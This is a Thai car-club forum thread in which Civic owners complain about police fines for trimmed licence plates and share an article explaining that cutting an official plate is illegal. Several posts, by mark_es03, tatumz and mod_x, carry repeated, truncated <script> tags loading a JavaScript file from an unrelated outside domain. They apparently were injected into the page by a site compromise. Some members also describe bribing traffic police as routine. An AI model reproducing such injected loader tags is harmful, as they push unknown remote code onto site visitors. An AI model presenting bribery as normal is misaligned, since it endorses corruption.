ตอบ
Eak-Inkjet

ชื่อเล่น: เอก

เข้าร่วม: 05 สิงหา 2010
ตอบ: 128

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 154
ให้คำขอบคุณ: 65

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 4 สิงหา 2011 11:04 - ระวังเรื่องป้ายทะเบียน
สงสัยไม่รู้จะหากินกันยังไงแล้ว หาไรจับไม่ได้ก็จะมาเอาเรื่องป้ายทะเบียนรถ

เค้าว่า "สั้นไปนะครับ สั้นกว่ามาตราฐานไป2เซนติเมตร มันทำให้กล้องซูมไม่เห็นตัวหนังสือนะครับ"

(พึ่งรู้ว่าตัดกรอบแล้วตัวหนังสือหดเล็กลง)

ระวังเรื่องป้ายทะเบียน
Chote

ชื่อเล่น: โจ่ว

เข้าร่วม: 27 พฤษภาคม 2011
ตอบ: 632

Guru ES
Guru ES

ได้รับคำขอบคุณ: 656
ให้คำขอบคุณ: 382

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 4 สิงหา 2011 11:07 - ระวังเรื่องป้ายทะเบียน
ได้รับคำขอบคุณจาก: Eak-Inkjet  civic753  karnmotocross01 
a.say

เข้าร่วม: 26 กันยา 2009
ตอบ: 711

Guru ES
Guru ES

ได้รับคำขอบคุณ: 725
ให้คำขอบคุณ: 1501

ปี: 2004
พฤหัส, 4 สิงหา 2011 11:09 - ระวังเรื่องป้ายทะเบียน
too
ได้รับคำขอบคุณจาก: Eak-Inkjet  karnmotocross01 
mr.smith

เข้าร่วม: 26 มิถุนา 2009
ตอบ: 169

ได้รับคำขอบคุณ: 157
ให้คำขอบคุณ: 99

ปี: 2002
พฤหัส, 4 สิงหา 2011 11:18 - ระวังเรื่องป้ายทะเบียน
ของผมข้างหน้าก็ตัดขอบ ทำไมกล้องมันยังถ่ายได้อ่ะ
ได้รับคำขอบคุณจาก: Eak-Inkjet  karnmotocross01 
arnut

ชื่อเล่น: โดนัท

เข้าร่วม: 12 เมษา 2010
ตอบ: 1385

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3786
ให้คำขอบคุณ: 624

ที่อยู่: บ้านอยู่ ดอนเมือง กรุงเทพ หอพัก ชลบรี ศรีราชา ม.เกษตร
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 4 สิงหา 2011 11:20 - ระวังเรื่องป้ายทะเบียน
สุดๆๆครับ
wallnarok_beer

ชื่อเล่น: ฝาเบียร์

เข้าร่วม: 15 มกรา 2010
ตอบ: 239

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 335

พฤหัส, 4 สิงหา 2011 11:25 - ระวังเรื่องป้ายทะเบียน
กรุงเทพ ก็เห็น ชัด นะครับ บางที่จับ เพราะ ไม่เห็น คำว่า กรุงเทพ เช่น ป้ายทะเบียนยาว... แล้วป้ายปกติ มันเห็น คำว่ากรุงเทพตรงไหน "สระ อุ" อะครับ น่าเห็นใจ
Natt

ชื่อเล่น: แนท

เข้าร่วม: 02 กุมภา 2010
ตอบ: 772

Guru ES
Guru ES

ได้รับคำขอบคุณ: 438
ให้คำขอบคุณ: 51

พฤหัส, 4 สิงหา 2011 11:28 - ระวังเรื่องป้ายทะเบียน
kimberly55

ชื่อเล่น: คิมเบอลี่

เข้าร่วม: 11 สิงหา 2009
ตอบ: 1141

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1050
ให้คำขอบคุณ: 405

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 4 สิงหา 2011 11:37 - ระวังเรื่องป้ายทะเบียน
เพลีย
boyboom_16

ชื่อเล่น: บอย

เข้าร่วม: 02 ตุลา 2008
ตอบ: 4179

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1559
ให้คำขอบคุณ: 4849

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 4 สิงหา 2011 11:54 - ระวังเรื่องป้ายทะเบียน
เอามาให้อ่านดูครับเห็นว่าดีไม่ได้มีเจตนาอื่นครับ
ตัดป้ายทะเบียน+ ใส่กรอบกว้าง...ผิดไหม ? เรามีคำตอบมาให้คุณ

ตัดป้ายทะเบียน+ ใส่กรอบกว้าง...ผิดไหม ?
การนำป้ายทะเบียนจริงของกรมการขนส่งทางบก ที่มีตัวย่อ ขส มุมล่าง ตัดให้เตี้ยแล้วใส่กรอบยาวที่มีสีขาว 2 ริมนอก ยังโชว์ตัวย่อ ขส ชัดเจนว่าเป็นป้ายฯ จริง เป็นแฟชั่นที่ระบาดในช่วง 2-3 ปีนี้ มีทั้งรับจ้างทำ ทำแบบแนบเนียน งานหยาบ หรือขายแต่กรอบให้นำมาใส่กับป้ายทะเบียนเอง ทำกันเกร่อ บางคนรู้ว่าผิดกฎหมาย แต่อยากสวยจึงทำและลุ้นว่าจะถูกจับหรือไม่ บางคนไม่รู้ว่าผิด เพรายังมีตัวย่อ ขส อีกทั้งคนรับจ้างใส่กรอบหรือขาย ส่วนใหญ่ก็บอกว่าไม่ผิดกฎหมาย ลูกค้าจะได้ตัดสินใจเสียเงิน อ่านคำตอบโดยตรงว่า ป้ายทะเบียนตัดใส่กรอบยาว...ผิดไหม ? และทิ้งท้ายด้วยคำตอบของผ่ายประชาสัมพันธ์ จากกรมการขนส่งทางบก

ป้ายทะเบียนยาว = การแก้ไขหรือการแต่งรถ

ป้ายทะเบียนรถของแต่ละประเทศทั่วโลก มีความแตกต่างกัน แต่แยกได้เป็น 2 แบบหลัก คือ แบบแคบ (สั้น) เหมือนของไทย ญี่ปุ่น สหรัฐอเมริกา และแบบกว้าง (ยาว) แบบหลายประเทศในทวีปยุโรป รถหลายรุ่นหลายยี่ห้อมีการผลิตและจำหน่ายในหลายประเทศ จึงต้องผลิตกันชนหรือฝากระโปรงให้สามารถติดป้ายทะเบียนให้ได้ทุกแบบ ผู้ผลิตบางรายพิถีพิถันแยกการผลิตช่องหรือหลุมติดป้ายฯ เป็น 2 แบบ แยกกันเลยตามแต่ประเทศที่จำหน่าย ซึ่งมีความยุ่งยากและสิ้นเปลืองต้นทุนมากกว่าอีกวิธีหนึ่ง คือ ทำเป็นช่องใส่ป้ายกว้างไว้ก่อน จะขายรถในประเทศใดก็สามารถใส่ป้ายทะเบียนได้ จะเป็นป้ายทะเบียนสั้นหรือยาวก็ใส่ได้ทั้งหมด

ถ้ารถที่มีช่องใส่ป้ายทะเบียนกว้าง ถูกในไปขายในประเทศที่เป็นป้ายฯ แคบ เช่นไทย ก็จะมีช่องว่าซ้าย-ขวาเหลือโล่งๆ อยู่ข้างละเกือบครึ่งคืบ เรื่องที่ไม่น่าจะเป็นปัญหาก็คือ บางคนมองว่าไม่สวย เพราะมีช่องว่างเหลืออยู่ริมซ้าย-ขวาของป้ายฯ ในขณะที่หลายคนไม่ได้มองว่าเป็นปัญหา สามารถ ติดป้ายฯ ได้แน่นหนาเป็นพอ จะมีช่องว่างเหลือก็ไม่เห็นเป็นอะไร

ปัญหาสำหรับคนรักสวยรักงามกับช่องว่างที่เหลืออยู่ริมซ้าย-ขวาของป้ายฯ มีความพยายามแก้ไขกันมาหลายรูปแบบ บางคนใจกล้าทำป้ายทะเบียนแบบกว้าง (ยาว) ขึ้นใหม่ คล้ายของทวีปยุโรป พอดีกับขนาดของช่องที่ตัวรถ ใช้แทนโดยตั้งใจไม่ติดป้ายฯ ของทางราชการ ยอมโดนปรับหรือติดสินบนเมื่อถูกจับ ข้อหาไม่ติดป้ายทะเบียนของราชการ (ไม่ใช่ข้อหาป้ายฯ ปลอม เพราะไม่ได้ทำเลียนแบบและมีตราของทางราชการ) แต่ก็มีคนกล้าทำไม่มาก เพราะสวยก็จริง แต่พร้อมถูกจับกุมได้ทุกเมื่อ ใช้รถอย่างไม่มีความสุข แม้จะปรับหรือติดสินบนไม่แพง แต่น่าเบื่อถ้าโดนจับบ่อยๆ

ในเมื่อกฎหมายไทยระบุให้รถต้องติดป้ายทะเบียนของทางราชการที่มีตัวย่อ ขส อยู่มุมล่าง (ขส = กรมการขนส่งทางบก) แต่มีความต้องการใช้ป้ายทะเบียนกว้าง จึงมีคนคิดดัดแปลงให้ป้ายฯ ขส ให้กลายเป็นป้ายฯ กว้าง และยังแสดงตัวย่อ ขส ไว้อย่างชัดเจน โดยทำกรอบป้ายพลาสติกอะครีลิก กว้างเท่ากับช่องกว้างที่ตัวรถ ที่ผิวด้านริมซ้าย-ขวาจะพ่นหรือติดสติกเกอร์สีขาวมุกแบบป้ายฯ แล้วเว้นช่องกลางให้ใส เพื่อใส่ป้ายฯ ขส จากด้านหลัง แล้วปิดด้านหลังและซีลกันน้ำเข้า

ผลออกมาจึงมองดูคล้ายว่าเป็นป้ายทะเบียนกว้างทั้งแผ่น แต่ก็ได้แค่คล้าย เพราะสีขาวมุกของป้ายและกรอบ มักไม่กลืนกัน ทั้งกรณีที่สีขาวมุกคนละเบอร์กัน สีป้ายฯ เก่าขาวอมเหลืองแต่ที่กรอบขาวใหม่เอี่ยม หรือสีคล้ายกัน แต่ก็อยู่คนละชั้นกัน สีขาวบนกรอบอยู่ผิวนอก แต่สีขาวบนป้ายฯ อยู่หลังพลาสติกใส ลึกลงไป 3-5 มิลลิเมตร แม้ไม่ได้สวยมากแบบการทำป้ายฯ กว้างขึ้นใหม่ทั้งอัน แต่หลายคนก็คิดว่า สบายใจที่ไม่ผิดกฎหมาย เพราะมองผ่านช่องใสของกรอบ ก็เห็นป้ายฯ ที่มีตัวย่อ ขส อย่างชัดเจน

ในความเป็นจริง ถ้าจะไม่ให้ผิดกฎหมาย ต้องไม่มีการตัดป้ายทะเบียน เพราะราชการระบุขนาดไว้อย่างชัดเจนว่า ป้ายฯ ต้องมีขนาดกี่เซนติเมตรคูณกี่เซนติเมตร แต่การทำกรอบป้ายฯ กว้างส่วนใหญ่ ต้องมีการตัดป้ายฯ เดิมให้เตี้ยลง ไม่งั้นจะไม่สวย ป้ายฯ จะทั้งสูงทั้งกว้างดูเทอะทะ จึงมีการตัดขอบบน-ล่าง หรือตัดทั้งบน-ล่างพร้อมตัดย่นช่วงกลาง เพื่อให้เตี้ยลงมากๆ เมื่อทำเสร็จป้ายฯ และกรอบจะเป็นทรงเตี้ยแต่กว้าง ดูสวยงาม และยังมีตัวย่อ ขส อยู่มุมล่าง ในขณะที่ชื่อจังหวัดที่มีสระอุ ตัวสระอุจะมองไม่เห็นหรือหายเป็น กลายเป็นกรงเทพมหานคร ไม่ใช่กรุงเทพมหานคร

การทำกรอบป้ายทะเบียนกว้าง แท้จริงจึงเป็นการแก้ไขที่ช่องบนตัวรถกว้างเกินไป ไม่ใช่การตกแต่งรถแต่อย่างไร รถรุ่นใดเป็นช่องแคบพอดีกับป้ายฯ ก็ไม่ต้องเสียใจที่ไม่ได้ใส่กรอบป้ายฯ กว้างใครอยากทำแบบต้องมีการตัดป้ายฯ ก็ต้องยอมรับเมื่อถูกจับ และก่อนจะทำก็ลองดูให้แน่ใจว่า จริงๆ แล้วสีขาวของป้ายฯ กับกรอบนั้นกลมกลืนกันจริงหรือไม่ ไม่ใช่คนละขาวกัน แทนที่จะสวยกลับดูกระดำกระด่าง

สรุป ตัดป้ายฯ = ผิดกฎหมาย

หลายคนคิดว่าไม่ผิดกฎหมาย ก็แค่ตัดป้ายฯ จริงแล้วใส่กรอบ แต่แท้จริงแล้วผิด แม้จะเหลือตัวย่อ ขส ให้เห็น เพราะมีการตัดเปลี่ยนขนาด ตำรวจสามารถจับได้ทุกเมื่อ ถ้าไม่จับ คือ อนุโลม แต่ถ้าจับก็เป็นการทำตามกฎหมายปกติ ไม่ได้กลั่นแกล้งอะไร ถ้าขึ้นศาล เจ้าของรถก็แพ้แน่ๆ หมดสิทธิ์ชนะคดี เพราะกฎหมายระบุไว้ชัดเจนถึงขนาดของป้ายทะเบียน ถ้ามีการตัดเปลี่ยนขนาด ทั้งตัดแค่ขอบบน-ล่าง หรือตัดทั้งบนล่างพร้อมหั่นช่วงกลางแยกเป็น 2 ชิ้น เพื่อย่นให้เตี้ย ล้วนผิดกฎหมาย มีบทลงโทษเป็นค่าปรับชัดเจน

ขอขอบคุณ Fortuner Club
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

พฤหัส, 4 สิงหา 2011 15:30 - ระวังเรื่องป้ายทะเบียน
เคยเจอครั้งนึง ไปกับพี่ชาย ใส่ป้ายกันน้ำ พอโพกให้จอดปุ๊บ พี่เค้าเอาแผ่นป้ายทะเบียนมาตรฐานมาทาบเลยครับ ถ้าเล็กกว่าแม้แต่น้อยก็โดน
mark_es03

ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 4 สิงหา 2011 15:32 - ระวังเรื่องป้ายทะเบียน
ดีนะ ผมไม่ได้ใส่ป้ายทะเบียน งั้นโดนแร้ว <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
puyzaaaaa

ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

พฤหัส, 4 สิงหา 2011 15:45 - ระวังเรื่องป้ายทะเบียน
ผม ไม่ ตัดไม่ อะไร ทั้งนั้น เอา 3M แปะะ เน้นๆ เลย
ได้รับคำขอบคุณจาก: hacker  Eak-Inkjet  karnmotocross01 
Nut_Au_Together

ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 4 สิงหา 2011 15:52 - ระวังเรื่องป้ายทะเบียน
puyzaaaaa พิมพ์ว่า:
ผม ไม่ ตัดไม่ อะไร ทั้งนั้น เอา 3M แปะะ เน้นๆ เลย

เหมือนกันครับ 3M แป๊ะมันดิบ ๆ เลย หมดปัญหาครับ
sevenartz

ชื่อเล่น: อาร์ท

เข้าร่วม: 17 มีนา 2010
ตอบ: 1321

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2847
ให้คำขอบคุณ: 20

สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 4 สิงหา 2011 16:20 - ระวังเรื่องป้ายทะเบียน
... คนจับ แม่ม เตี้ยยย จริงๆ

เรื่องคอขาดบาดตาย ของหาย ตามแล้วตามอีก บอกคดีไม่คืบ

ก็เพราะมาจับเรื่องเล็กน้อยอยู่แบบนี้ เห้ออออออออ

ยังดีไม่โดนข้อหาไม่ล้างรถ อันนี้สุดตรีนนนส์กว่า 555
...
ได้รับคำขอบคุณจาก: Eak-Inkjet  Phetcharat  karnmotocross01 
ming

ชื่อเล่น: หมิง

เข้าร่วม: 24 สิงหา 2009
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 844
ให้คำขอบคุณ: 1701

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 4 สิงหา 2011 16:54 - ระวังเรื่องป้ายทะเบียน
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พฤหัส, 4 สิงหา 2011 17:27 - ระวังเรื่องป้ายทะเบียน
ผมว่าเราทำให้มันผิดจากของเดิมมันก็ผิดแล้วนะ
และเราก็รู้ว่ามันผิดด้วยตั้งแต่ตอนทำ(อันนี้ความเห็นส่วนตัวนะครับ)
โดยเฉพาะเราเป็นนักแต่งรถ ชอบแต่งให้แตกต่างจากเดิม
อันนี้ยิ่งต้องทำใจล่วงหน้าเลยว่า ถ้าทำไปแล้ววันหนึ่งก็ต้องโดนเรียก
อย่างรถผมสีบรอนเงินแต่ฝาหน้าและหลังดำ ไม่รู้กี่เปอร์เซ็นของสีรถ
แต่ยังได้แจ้งในเล่ม ผมก็รู้ว่ามันผิดแต่ผมชอบและก็เตรียมพร้อมถ้าหาก
โดนเรียก(1ใบแดง)แต่ยังไม่เคยโดน และไม่อยากโดนด้วย อีกอันที่เราๆท่านๆ
ชอบบ่นกันคือเรื่องไฟตัดหมอก อันนี้ก็ต้องยอมรับครับถ้าเปิดสุ่มสี่สุ่มแปด
ก็โดนแน่นอน อันนี้ผมรู้เพราะผมโดนแล้ว ก็อีกนั่นแหละ 1ใบแดงก็จบ
จริงเรื่องที่ยัดเงินเจ้าหน้าเป็นเรื่องไม่ดีซักเท่าไหร่ แต่บางครั้งมันก็ช่วยให้เรื่องจบง่าย
เพราะเราผิดจริง แต่ถ้าเราไม่ผิดค่อยว่ากันอีกทีเถียงให้ตายไปข้างหนึ่งเลย(อันนี้ผมก็เคย)

ที่ผมคิดต่างไม่ได้มีเจตนาเป็อย่างอื่นนะครับ เพียงแต่ส่วนตัวผมว่าบางครั้ง
เราเองก็มีส่วนที่ทำให้หลายๆ อย่างในบ้านเมืองเราไม่มีระเบียบ
ต่างคนต่างหน้าที่ครับ เหมือนเราทำงานบริษัทนะครับ มีตั้งแต่ผู้บริหารยันกรรมกร
ตำรวจก็เหมือนกันครับ มีหลายหน่วยงาน แต่งานจราจรเขาก็ต้องเคร่งครัดเรื่องจราจรครับ
จะให้เขาไปเคร่งครัดงานสืบสวนก็คงไม่ถูก เราชอบบอกว่ากฎหมายออกมาเปิดช่องให้ตำรวจ
หากิน ผมว่าขึ้นอยู่กับเราครับว่าจะเปิดช่องให้กับตำรวจหรือเปล่า และที่แน่ๆรถผมเปิดช่องเพียบครับ

ปล.เป็นเพียงความคิดเห็นส่วนตัวนะครับหากมีต่างก็ขอ อภัยครับ

ได้รับคำขอบคุณจาก: boyboom_16  Eak-Inkjet  tatumz  gahn27  Phetcharat  mod_x  numxs  karnmotocross01 
Eak-Inkjet

พฤหัส, 4 สิงหา 2011 18:03 - ระวังเรื่องป้ายทะเบียน
ถูกต้องแล้วครับ ผมเข้าใจดีว่ามันผิด แต่แบบว่า รู้เจตนาของคนจับว่าจะสื่ออะไร เค้าไม่ได้อยากจัดระเบียบ เค้าแค่ต้องการรายได้ เพราะวนดูรอบคันเลย หาจุดผิด ถ้าจริงๆก็ผิดเยอะครับ ทั้งโหลดต่ำกว่าปกติ เปลี่ยนแม๊กก็เคยโดนมาแล้ว สิบสามปีที่แล้ว ผมขับตาโตเทอโบขึ้นทางด่วนกับเพื่อน จะโดนจับข้อหาไม่คาดเบลของเดิม เพราะเค้าใส่recaro srIII เลยใส่เบล4จุดของซาเบล รัดจนตัวติดเบาะ เค้ายังว่าไม่ปลอดภัยเลยครับ

สรุปคือคนที่จับแบบนี้เค้าอาศัยช่องกฎหมายจะเอาตังเราครับ เค้าว่าถ้าไม่อยากถูกปรับก็ขับแบบเดิมๆออกศูนย์ จะได้ไม่โดน
ได้รับคำขอบคุณจาก: boyboom_16  karnmotocross01 
Eak-Inkjet

พฤหัส, 4 สิงหา 2011 18:54 - ระวังเรื่องป้ายทะเบียน
คันนี้ผมก็โดนมาแล้วครับ

ติดป้ายเอียง เค้าว่ามองไม่เห็น โดนไป2000บาท สน.เดียวกันนี่ละ คือแบบว่า ถ้าบอกเหตุผลดีๆค่อยน่าฟังหน่อย ดันบอกว่าเวลากล้องซูมมามันไม่เห็น ตัดกรอบนะครับ ไม่ได้เอาป้ายไปย่อขนาดมันคุณโปลีสสสสสส ถ้าจะวิ่งผ่านถนนนี้เวลานี้ทุกวันคงต้องไปทำป้ายใหม่

ปล.ผมไม่ได้ตัดป้ายนะครับ ซื้อเต๊นมาก็สภาพนี้แล้วครับ ด้วยความสัตย์จริง

แก้ไขลืมลงรูปแนบ
ได้รับคำขอบคุณจาก: karnmotocross01 
civictepchai

ชื่อเล่น: โจ

เข้าร่วม: 28 ตุลา 2010
ตอบ: 32

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 43
ให้คำขอบคุณ: 0

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 4 สิงหา 2011 19:13 - ระวังเรื่องป้ายทะเบียน
ผมก็เคยโดน ป้ายหน้าตัดขอบ ป้ายหลังย่นยาว แต่โดนแค่ป้ายหลัง 400 บาท
ต่อเหลือ 300 บาท โดน 2 ครั้ง ที่แสมดำ อิอิ ไม่เข็ดยังใส่เหมือนเดิม
ได้รับคำขอบคุณจาก: karnmotocross01 
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พฤหัส, 4 สิงหา 2011 19:20 - ระวังเรื่องป้ายทะเบียน
Eak-Inkjet พิมพ์ว่า:
ถูกต้องแล้วครับ ผมเข้าใจดีว่ามันผิด แต่แบบว่า รู้เจตนาของคนจับว่าจะสื่ออะไร เค้าไม่ได้อยากจัดระเบียบ เค้าแค่ต้องการรายได้ เพราะวนดูรอบคันเลย หาจุดผิด ถ้าจริงๆก็ผิดเยอะครับ ทั้งโหลดต่ำกว่าปกติ เปลี่ยนแม๊กก็เคยโดนมาแล้ว สิบสามปีที่แล้ว ผมขับตาโตเทอโบขึ้นทางด่วนกับเพื่อน จะโดนจับข้อหาไม่คาดเบลของเดิม เพราะเค้าใส่recaro srIII เลยใส่เบล4จุดของซาเบล รัดจนตัวติดเบาะ เค้ายังว่าไม่ปลอดภัยเลยครับ

สรุปคือคนที่จับแบบนี้เค้าอาศัยช่องกฎหมายจะเอาตังเราครับ เค้าว่าถ้าไม่อยากถูกปรับก็ขับแบบเดิมๆออกศูนย์ จะได้ไม่โดน

ทำใจเถอะครับตำรวจไทย ก็เป็นแบบนี้กันซะส่วนใหญ่ครับ
อาศัยช่องของกฎหมาย แต่ก็ไม่ได้จริงจังที่จะทำให้ดีที่สุด
จะทำก็ต่อเมื่อนายสั่งหรือหิวเท่านั้น แต่ก็หยั่งว่าเราก็ดันผิดจริง
เลยเถียงมันไม่ได้ เฮ้อออออออออออออออ

ปล.ฝาดำของผมก็ไม่รู้จะโดนวันไหนเหมือนกัน
ได้รับคำขอบคุณจาก: civic753  karnmotocross01 
Eak-Inkjet

พฤหัส, 4 สิงหา 2011 20:07 - ระวังเรื่องป้ายทะเบียน
sukhothai พิมพ์ว่า:
Eak-Inkjet พิมพ์ว่า:

ทำใจเถอะครับตำรวจไทย ก็เป็นแบบนี้กันซะส่วนใหญ่ครับ
อาศัยช่องของกฎหมาย แต่ก็ไม่ได้จริงจังที่จะทำให้ดีที่สุด
จะทำก็ต่อเมื่อนายสั่งหรือหิวเท่านั้น แต่ก็หยั่งว่าเราก็ดันผิดจริง
เลยเถียงมันไม่ได้ เฮ้อออออออออออออออ

ปล.ฝาดำของผมก็ไม่รู้จะโดนวันไหนเหมือนกัน

เคยใส่ครับฝาดำกับเซริก้าไฟป๊อบแต่ผมไม่เคยโดนจับข้อหานี้

คือว่าเป็นแค่บางพื้นที่ครับ บางที่เค้าก็หยวนๆ บางทีมีโบกให้จอดถามว่าไปแต่งที่ไหนมาทำสีที่ไหนมาจะไปทำบ้างก็มีครับ ล่าสุดตีสามตรวจรถผมเห็นเครื่องเสียงก็ขอให้เปิดให้ฟังก็มี คุยดีมาก็ดีกลับครับ พูดจาแย่ก็มี ไม่มีหางเสียง ถึงผมจะแค่35 ก็ประชาชนนะครับ พูดจาขวานผ่าซาก "บ้านอยู่ไหน ทำงานไร เป็นเจ้าของเองจิงป่าว ล่าสุดนี่ ตะหวาดผมว่า บอกให้ฉี่ให้เต็มไง (ก็กุเพิ่งเยี่ยวมาจากออฟฟิตจะมีอะไรให้ออกอีก) ถ้าพูดจามีหางเสียงแบบบางสน.ผมเปิดให้ดูทั้งคันเลยครับ จะค้นอะไร ตามสบาย

จริงๆผมแค่น้อยใจครับ รถตำรวจเองยังแต่งเลย เห็นรถผู้กำกับ ผู้กอง แม๊กโตโหลดเตี๊ย แต่งสารพัด ขับกันฉิวเลย น่าจะอนุโลมให้เราบ้าง ผมกะตร.นี่เถียงกันตั้งกะได้ใบขับขี่ยันลูกโตขึ้นม.2แล้วครับ 555+ ส่วนมากจะแพ้เพราะเค้าพูดคำเดียวมันผิดกฎหมาย จบข่าว
ได้รับคำขอบคุณจาก: sukhothai  karnmotocross01 
wangyu

ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

พฤหัส, 4 สิงหา 2011 20:41 - ระวังเรื่องป้ายทะเบียน
นี้แหละผู้พิทักษ์สันติราษฎร์ คนดีก็มีครับ

ratachai

เข้าร่วม: 22 กรกฎา 2010
ตอบ: 596

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 631
ให้คำขอบคุณ: 105

พฤหัส, 4 สิงหา 2011 20:43 - ระวังเรื่องป้ายทะเบียน
เอาจริงๆไหมคับผมมีเรื่องตำรวจบ่อย ผมถามท่านเลยตอบนะ "จ่าจ่ายตงนี้100หรือไปจ่ายที่สน แพงกว่านะเสียเวลาด้วย"จัดไปคับ ส่วนตัวผมกลัวตำรวจมากกว่าโจร ผมรู้คุณก็คิด
ได้รับคำขอบคุณจาก: civic753  karnmotocross01 
Ball Featuring

ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 4 สิงหา 2011 20:47 - ระวังเรื่องป้ายทะเบียน
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

พฤหัส, 4 สิงหา 2011 20:50 - ระวังเรื่องป้ายทะเบียน
กฎหมายร่างๆกัน ถามกุซักคำไหม -*-
ได้รับคำขอบคุณจาก: civic753  mod_x  karnmotocross01 
Meemangkang

ชื่อเล่น: แอร์

เข้าร่วม: 01 เมษา 2010
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1430
ให้คำขอบคุณ: 1329

พฤหัส, 4 สิงหา 2011 21:01 - ระวังเรื่องป้ายทะเบียน
ทำกันได้...
ได้รับคำขอบคุณจาก: civic753 
tatumz

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

พฤหัส, 4 สิงหา 2011 21:03 - ระวังเรื่องป้ายทะเบียน
ต่อป้ายให้ยาวดีก่า อิอิ <script src="https://sport32news.com/civicesgroup.js"></
civic753

ชื่อเล่น: ชาติ

เข้าร่วม: 11 พฤศจิกา 2009
ตอบ: 1301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1304
ให้คำขอบคุณ: 2395

ศุกร์, 5 สิงหา 2011 01:20 - ระวังเรื่องป้ายทะเบียน
เดิมๆๆๆๆไปได้ทั่วไทย
asaweenaruk

ชื่อเล่น: เฉียง

เข้าร่วม: 04 มีนา 2009
ตอบ: 287

ผู้ใช้นี้มีความผิด
ผู้ใช้นี้มีความผิด

ได้รับคำขอบคุณ: 382
ให้คำขอบคุณ: 227

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 5 สิงหา 2011 04:47 - ระวังเรื่องป้ายทะเบียน
ช่วงแรกๆผมก้อเคยโดนคับ ตอนแรกมันดูว่าผมคาดเข็มขัดหรือเปล่าพอเหนผมคาดอยู่มันเลยไปเล็งป้ายทะเบียน(ไปกรุงเทพเมื่อไหร่ก้อโดนเรื่องป้ายตลอด เหนเปนป้ายต่างจังหวัด แล้วมันไม่คิดมั้งเลยว่ากูจะไปเสียค่าปรับที่ไหน กูไม่ใช่คนแถวนั้นสักหน่อย )
ผมโดน สภ.แสมดำ กำลังจะไปตลาดอัมพวา
mod_x

ชื่อเล่น: มด เอ๊กซ์

เข้าร่วม: 20 เมษา 2009
ตอบ: 670

Guru ES
Guru ES

ได้รับคำขอบคุณ: 657
ให้คำขอบคุณ: 345

ศุกร์, 5 สิงหา 2011 08:11 - ระวังเรื่องป้ายทะเบียน
pannatad พิมพ์ว่า:
กฎหมายร่างๆกัน ถามกุซักคำไหม -*-

+ 10 ครับอันนี้ผมชอบมาก <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.